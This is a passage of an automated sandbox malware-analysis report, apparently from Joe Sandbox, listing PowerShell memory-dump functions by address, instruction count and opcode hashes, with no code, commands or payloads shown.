                                                                                                                • Instruction ID: b62159d18bfc760a8676eb6e8016367d5df80f68eebd75df6a4514e56c8e8bdd
                                                                                                                • Opcode Fuzzy Hash: 30c00a267e65b28e155936c65485e36cdb68e86801b421a0f52310d2d9efdd7a
                                                                                                                • Instruction Fuzzy Hash: 4F2269B4A10205CFEB14CF84C650F6ABBB2EB85318F95C4A9E905AF795C772EC46CB41
                                                                                                                Function 07B14C3F Relevance: 1.7, Strings: 1, Instructions: 476COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q
                                                                                                                • API String ID: 0-1807707664
                                                                                                                • Opcode ID: 4e36f7cbff4f9ad7d4645c461021d44373591c219fff29dcc0f80dc9ee5b12a4
                                                                                                                • Instruction ID: 7851a454841589435b6356f09c8a2e3cee3f53e09da03411b4b4b519aa2ac3ce
                                                                                                                • Opcode Fuzzy Hash: 4e36f7cbff4f9ad7d4645c461021d44373591c219fff29dcc0f80dc9ee5b12a4
                                                                                                                • Instruction Fuzzy Hash: 301289B0A10241CFEB14CF94C650F6ABBB2EB85314F95C4A8E905AF395CB72EC46CB51
                                                                                                                Function 07B14974 Relevance: 1.7, Strings: 1, Instructions: 457COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q
                                                                                                                • API String ID: 0-1807707664
                                                                                                                • Opcode ID: 48a0860ecf3f0576028d95d051e17cbf385e775fc924b1a4d8cfa49de8fc254e
                                                                                                                • Instruction ID: 63cf7e5cc1828eec1d185f60a09ddcad8a85b49720c09cbc9036ca28da295535
                                                                                                                • Opcode Fuzzy Hash: 48a0860ecf3f0576028d95d051e17cbf385e775fc924b1a4d8cfa49de8fc254e
                                                                                                                • Instruction Fuzzy Hash: BF1268B4A10205CFEB14CB84C650F6ABBB2FB85314F95C4A8E905AF795CB72EC46CB41
                                                                                                                Function 07B11597 Relevance: 1.7, Strings: 1, Instructions: 448COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q
                                                                                                                • API String ID: 0-1807707664
                                                                                                                • Opcode ID: 70164151cff7924b80f8ee121ed9323d7194b05aa6b24c3b0d51e4ee84a1bbe0
                                                                                                                • Instruction ID: 218de547c53a7ebe62cbe68b1d1f8d5bba94662983b243e29bbbddf827f0e18e
                                                                                                                • Opcode Fuzzy Hash: 70164151cff7924b80f8ee121ed9323d7194b05aa6b24c3b0d51e4ee84a1bbe0
                                                                                                                • Instruction Fuzzy Hash: 52028BB4B00309DFEB15CB58C550BA9BBB2FB85314F55C0A9EA059B391CB72EC85CB51
                                                                                                                Function 07B11001 Relevance: 1.7, Strings: 1, Instructions: 430COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q
                                                                                                                • API String ID: 0-1807707664
                                                                                                                • Opcode ID: 5f08133038695233465d33bd094bb71f5219f7a19118c3b7a99ca8318f15e5db
                                                                                                                • Instruction ID: f3411d6c867c60faed43a2570b3acb19b7464091905e4110aa46535223fdbe91
                                                                                                                • Opcode Fuzzy Hash: 5f08133038695233465d33bd094bb71f5219f7a19118c3b7a99ca8318f15e5db
                                                                                                                • Instruction Fuzzy Hash: F7028BB4A01309DFEB15CF98D550BA9BBB2FB85314F55C0A9EA059B351C732EC82CB91
                                                                                                                Function 07B112AC Relevance: 1.6, Strings: 1, Instructions: 390COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q
                                                                                                                • API String ID: 0-1807707664
                                                                                                                • Opcode ID: 5fc9ab11477ed13e221251ad44263454614f71fcb5a0731cc05574c60a5331fa
                                                                                                                • Instruction ID: 6b54ec664a484e2714562696ac1addbfb16f5aa534fbb2440c768612e366aa77
                                                                                                                • Opcode Fuzzy Hash: 5fc9ab11477ed13e221251ad44263454614f71fcb5a0731cc05574c60a5331fa
                                                                                                                • Instruction Fuzzy Hash: BDF17CB4B00208DFEB15CB58D550B99BBB2FB85314F55C0A9EA059F395CB72EC82CB91
                                                                                                                Function 07B15D40 Relevance: 1.5, Strings: 1, Instructions: 275COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: x.~k
                                                                                                                • API String ID: 0-3602960429
                                                                                                                • Opcode ID: 90af1c386de9db3775bfb5b3602c60e3b60d33ed322cda6b65e2e6dff96bc600
                                                                                                                • Instruction ID: bdc4257edf6c64dba4973fe55b69e71e97f0f6c18cde0bbc67668a0620507cbd
                                                                                                                • Opcode Fuzzy Hash: 90af1c386de9db3775bfb5b3602c60e3b60d33ed322cda6b65e2e6dff96bc600
                                                                                                                • Instruction Fuzzy Hash: 7CB18CB0B002059FE725DB64C554BAEBBE3EFC9304F9584A9E905AF791CB32EC418B51
                                                                                                                Function 07B15D21 Relevance: 1.5, Strings: 1, Instructions: 271COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: x.~k
                                                                                                                • API String ID: 0-3602960429
                                                                                                                • Opcode ID: 9c83d798224e409308ec3a327567649d25a2e601718c506811ed6422c0bf6d88
                                                                                                                • Instruction ID: 23c2f386e89fd9d13f03a7dbe675e8a08c888b4263cf54ae4735fc51c594d402
                                                                                                                • Opcode Fuzzy Hash: 9c83d798224e409308ec3a327567649d25a2e601718c506811ed6422c0bf6d88
                                                                                                                • Instruction Fuzzy Hash: A8A18CF0A002019FE725CB54C594BAEBBA3FF89318F95C4A9E504AB791CB32EC41CB51
                                                                                                                Function 07B1804E Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: x.~k
                                                                                                                • API String ID: 0-3602960429
                                                                                                                • Opcode ID: 0d7f2e5a46ffe5d82c2f9d214418aff1404ac9a64943a912735266be42cef80a
                                                                                                                • Instruction ID: 56d6e24ab0a30acab006a70f7fdd6a725b2125391e927c050661eae4166b344e
                                                                                                                • Opcode Fuzzy Hash: 0d7f2e5a46ffe5d82c2f9d214418aff1404ac9a64943a912735266be42cef80a
                                                                                                                • Instruction Fuzzy Hash: 7A3182B0B00214AFE7149BA4C964FAE7AA3BFC4714F11C428E9016F7D1CE75EC028B95
                                                                                                                Function 04D48CC0 Relevance: .4, Instructions: 385COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5b9bf6aa91055ca0981076164bbdac511f3470401d65e308a88acaaedbe0ebe5
                                                                                                                • Instruction ID: 90b21eb842e0d15bafffbdae19e5facd25de3c41ee42a918b267fd908b1b6dd0
                                                                                                                • Opcode Fuzzy Hash: 5b9bf6aa91055ca0981076164bbdac511f3470401d65e308a88acaaedbe0ebe5
                                                                                                                • Instruction Fuzzy Hash: BDE1CF34A043849FDB11EBB5C854A5EBBB2FFC6304F1581AAE445DF2A6CB34AC49DB50
                                                                                                                Function 04D431C8 Relevance: .3, Instructions: 299COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b75b37747066537c1badebcf1a2c28086ee10fcd8854242334310606b23c95b4
                                                                                                                • Instruction ID: 0d1e975e6e02c1e06672913cbd5148adb53bf8735461a324acf551c05e6e3f99
                                                                                                                • Opcode Fuzzy Hash: b75b37747066537c1badebcf1a2c28086ee10fcd8854242334310606b23c95b4
                                                                                                                • Instruction Fuzzy Hash: F9C10434F01208AFDB15CFA8D484A9DFBB2BF88314F248559E859AB365C731ED46CB90
                                                                                                                Function 04D48528 Relevance: .2, Instructions: 198COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 1e1cfc3d6ca9bacf3969967798e43b3e637c874fbf2cbe9cddab793d5f150ba0
                                                                                                                • Instruction ID: 3d699e8142331b9b3b6db9d30caba088456ad959561e4349c4cfe4192eeb024d
                                                                                                                • Opcode Fuzzy Hash: 1e1cfc3d6ca9bacf3969967798e43b3e637c874fbf2cbe9cddab793d5f150ba0
                                                                                                                • Instruction Fuzzy Hash: 4871C138A01204DFCB14EFA8D484AADBBF2FF89354F1984A9E445AB361CB35EC45DB50
                                                                                                                Function 04D495F6 Relevance: .2, Instructions: 188COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c5ce899edd1b749b3712ccbc85cc99ea29184c13c8ad3df183a38eac70d467ba
                                                                                                                • Instruction ID: fc79b17d10d1c122feb91e3a8cd6e8f4f09c2e2dbac7357d29c35d0de1c0256e
                                                                                                                • Opcode Fuzzy Hash: c5ce899edd1b749b3712ccbc85cc99ea29184c13c8ad3df183a38eac70d467ba
                                                                                                                • Instruction Fuzzy Hash: A7713B70A002089FDB24DFB6D854BAEBBF2BF88314F248469D411AB760DB35AD46CF50
                                                                                                                Function 04D49488 Relevance: .2, Instructions: 184COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ba5a2efcc5d3637b6a4c792c616e4c0163db43a44673658005c56160ca6bfa61
                                                                                                                • Instruction ID: 267d89fd03ddfaf9168a9696cac8b1d93aeaefe13ea416bacdc8efa9f84c08a4
                                                                                                                • Opcode Fuzzy Hash: ba5a2efcc5d3637b6a4c792c616e4c0163db43a44673658005c56160ca6bfa61
                                                                                                                • Instruction Fuzzy Hash: 96718B70A00209CFDB24DFA9C894A9EBBF2FF84314F2485A9D4199B654DB75EC46CB80
                                                                                                                Function 04D49219 Relevance: .1, Instructions: 119COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 94aeafe1b5f5c167a5d38c96e34bcb5a476b3bad5a3184f71f7d3698faa351bd
                                                                                                                • Instruction ID: fcef07c8fb90d2f9d66948c75575f38684ee8338e2f7c5032603e1814b75369f
                                                                                                                • Opcode Fuzzy Hash: 94aeafe1b5f5c167a5d38c96e34bcb5a476b3bad5a3184f71f7d3698faa351bd
                                                                                                                • Instruction Fuzzy Hash: 79414F75A002049FDB149BB5D9A4BAA7BF6FFC9750F1540A8E406EB7A0CB35AC41CB50
                                                                                                                Function 04D49473 Relevance: .1, Instructions: 116COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0e55e7444d1f039bbf34030912ba9b87e0bae6f8580fd89d861920b7707df9af
                                                                                                                • Instruction ID: c3500cb2516e28a237c43e2ae0a9373c9d9d53fedf9031141d8d54c5b2956f49
                                                                                                                • Opcode Fuzzy Hash: 0e55e7444d1f039bbf34030912ba9b87e0bae6f8580fd89d861920b7707df9af
                                                                                                                • Instruction Fuzzy Hash: 08416B70A00208DFDB24DFA6C89879EBBF2BF84304F148469D415AB794DB75AC46CF90
                                                                                                                Function 04D4311D Relevance: .1, Instructions: 97COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4a10e2ac1f89d6cc687e5897ad57691cddb99a97e688467ac49835910b7a7d86
                                                                                                                • Instruction ID: dc2e271912cc27ffff5b3c9be64a7f286451ba66c5af2ba75e30c4ae2380fd1b
                                                                                                                • Opcode Fuzzy Hash: 4a10e2ac1f89d6cc687e5897ad57691cddb99a97e688467ac49835910b7a7d86
                                                                                                                • Instruction Fuzzy Hash: CD319370E093858FD702DB68D8A0ADABFB0BF46210B1541DBD8849B253C624FC49CBA5
                                                                                                                Function 07B10A78 Relevance: .1, Instructions: 94COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 68820095273cbfe705320f08ba534b02976f9c60970a878e58baf5e7cc91e826
                                                                                                                • Instruction ID: 378c1c8cd89f3420024b59cc5b0ee62ef63dce675fe344e07814342ee05d976e
                                                                                                                • Opcode Fuzzy Hash: 68820095273cbfe705320f08ba534b02976f9c60970a878e58baf5e7cc91e826
                                                                                                                • Instruction Fuzzy Hash: B02179F13103179BEB28A6AA5811737768AEBC5315F64847EF606CB3C4CE71D8818361
                                                                                                                Function 04D4BAE8 Relevance: .1, Instructions: 92COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4355fe154db08cc7323ac08f397915b0bb7c904182ecdbdbba1a10d6b44590e3
                                                                                                                • Instruction ID: e28628d1160c13f519888699544e7155bf4af778408b67e17e506e7f0d1b04fc
                                                                                                                • Opcode Fuzzy Hash: 4355fe154db08cc7323ac08f397915b0bb7c904182ecdbdbba1a10d6b44590e3
                                                                                                                • Instruction Fuzzy Hash: 53314A30B042588FCB25DB64C8506EEB7B2AF89304F1144EAD909AB355DB75EE86CF81
                                                                                                                Function 07B10A5D Relevance: .1, Instructions: 81COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5d0970813bc7a94d4487fd276731e7d08b6d5788389616ebb601c5f6002098de
                                                                                                                • Instruction ID: 5e4cacd432908828622db536e3d474ae9e9cfbe03e6c3006318203c882b8581e
                                                                                                                • Opcode Fuzzy Hash: 5d0970813bc7a94d4487fd276731e7d08b6d5788389616ebb601c5f6002098de
                                                                                                                • Instruction Fuzzy Hash: CD2198F03043536FEB29666598117637B969F82314F2880AAF944CF2C6CA39D9C0C3B6
                                                                                                                Function 04D4317D Relevance: .1, Instructions: 80COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2151ae47b1272a0950830d2bcbc8653bee5073540f6649d4c41bf8d502118200
                                                                                                                • Instruction ID: 92e847cea0d944110e56fb37d42c3b5bdab1117742a1277a7aee3281deeffed1
                                                                                                                • Opcode Fuzzy Hash: 2151ae47b1272a0950830d2bcbc8653bee5073540f6649d4c41bf8d502118200
                                                                                                                • Instruction Fuzzy Hash: 8D319570E093859FCB02DF68C890A9ABFF1FF4A210B15409AD899DB352C634FC45CBA5
                                                                                                                Function 07B10868 Relevance: .1, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 0f3bab5d4bc4528c921f2d5ecbd10393a47464289d5038588f871f84729d014d
                                                                                                                • Instruction ID: 3e960772a7d3b8702b6d21221b9305a43cf20cfb52efe087e132550cbb950f74
                                                                                                                • Opcode Fuzzy Hash: 0f3bab5d4bc4528c921f2d5ecbd10393a47464289d5038588f871f84729d014d
                                                                                                                • Instruction Fuzzy Hash: F60147B6318316CBE72475AA940427AB795DFC5222F94C47BD945C7A40D632C885C7E0
                                                                                                                Function 04D4EC13 Relevance: .0, Instructions: 49COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748895531.0000000004D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 13bea6d63b9faa5a182748931bce132f350d24654b29046eae1f629a09634036
                                                                                                                • Instruction ID: 05c18e6795a59ab2a625f5bf2035d24dabedcd0a7ff49b69de35233a2be8543a
                                                                                                                • Opcode Fuzzy Hash: 13bea6d63b9faa5a182748931bce132f350d24654b29046eae1f629a09634036
                                                                                                                • Instruction Fuzzy Hash: FD117230D04298EBEF35DEA8D5987ECBBB2BF8531AF181529C001B6194DB7468C9CB55
                                                                                                                Function 04C8D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748373400.0000000004C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C8D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4c8d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: de290461da710c37bbfcb1333c267f50da8288b7afdeaed139ae6e7ef6d8fb1f
                                                                                                                • Instruction ID: a7d8bcae6bf9f42c4d9ed65751a176eae8829579bcb163dceda9a67efecfe275
                                                                                                                • Opcode Fuzzy Hash: de290461da710c37bbfcb1333c267f50da8288b7afdeaed139ae6e7ef6d8fb1f
                                                                                                                • Instruction Fuzzy Hash: D601D8315083049AE7206A11ECC4766BF99DF41229F08C05DEC450B1C2C775A945CBB1
                                                                                                                Function 07B1A306 Relevance: .0, Instructions: 38COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c7daee64b379e95213b21bf38bb29f0a2bea0315caff3a8c4c51404a8d0a9676
                                                                                                                • Instruction ID: 3442189c79d3f42d47bc65aa9edfe191d4489630b582df52304c0bf2249fa2ed
                                                                                                                • Opcode Fuzzy Hash: c7daee64b379e95213b21bf38bb29f0a2bea0315caff3a8c4c51404a8d0a9676
                                                                                                                • Instruction Fuzzy Hash: 68F08BF1B012148BDB35696879013D9BB99DFC4220B968CAADC015B344E920BD0283D5
                                                                                                                Function 04C8D01C Relevance: .0, Instructions: 36COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748373400.0000000004C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C8D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4c8d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ade8291bdfa8208393db8323148635c8e664353e689fb84506115eb2e4161565
                                                                                                                • Instruction ID: a3b5226bcc8e77d4571756bd7fe96bb46a8ddeac923fc063e21cb00a14890ebb
                                                                                                                • Opcode Fuzzy Hash: ade8291bdfa8208393db8323148635c8e664353e689fb84506115eb2e4161565
                                                                                                                • Instruction Fuzzy Hash: 5EF0CD72008344AEE7209E16DC84B62FF98EB41339F18C15EED484A282C379A880CBB1
                                                                                                                Function 07B130D4 Relevance: .0, Instructions: 24COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: e2e4b1e14f3bce2b8ee96c1be5a65618991c8a191353a12c067d0c9b7dc494d6
                                                                                                                • Instruction ID: 7700228bfa14319c08891eeb1082f6ca35cfadfadb202d1d91344706d03fdc1d
                                                                                                                • Opcode Fuzzy Hash: e2e4b1e14f3bce2b8ee96c1be5a65618991c8a191353a12c067d0c9b7dc494d6
                                                                                                                • Instruction Fuzzy Hash: 17F030B56093859FD3128B24C856A50BFB2AF43215B5EC1C7C0448F1A3D336C856C751
                                                                                                                Function 07B13230 Relevance: .0, Instructions: 22COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: c491f60b4664b8f94918af17763454e0726b80e3971bbdba956719028f12760b
                                                                                                                • Instruction ID: 6fada9babbf9edd30b9df275be2082e05ed568436f152101784c574c98002fee
                                                                                                                • Opcode Fuzzy Hash: c491f60b4664b8f94918af17763454e0726b80e3971bbdba956719028f12760b
                                                                                                                • Instruction Fuzzy Hash: 77E04FF6600201EBEA10EA40E885A91F7E2EB82715F58C1D9A4180F195D733D946CAC0

                                                                                                                Non-executed Functions

                                                                                                                Function 04C8D6E0 Relevance: .1, Instructions: 75COMMON
                                                                                                                Download Yara Rule
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1748373400.0000000004C8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C8D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_4c8d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3f778d0ec159f725c71b0da4456012b9c9249a37fb68612dba8dd4b136aace35
                                                                                                                • Instruction ID: 8184f8181766cd2c933b709a4f84070437b12e609b924e5adaef24e64e3252d8
                                                                                                                • Opcode Fuzzy Hash: 3f778d0ec159f725c71b0da4456012b9c9249a37fb68612dba8dd4b136aace35
                                                                                                                • Instruction Fuzzy Hash: C421FB76604304EFDB15EF10D9C0B16BF66FB84324F24C56DD80A0B28AC335E456CBA1
                                                                                                                Function 07B12410 Relevance: 12.8, Strings: 10, Instructions: 302COMMON
                                                                                                                Download Yara Rule
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000007.00000002.1783015081.0000000007B10000.00000040.00000800.00020000.00000000.sdmp, Offset: 07B10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_7_2_7b10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 4'q$4'q$4'q$4'q$$q$$q$$q$$q$$q$$q
                                                                                                                • API String ID: 0-4104424984
                                                                                                                • Opcode ID: 1d3403922367b2476d2e18775023ab59dafae935057b322bc2a52de78edc1ab3
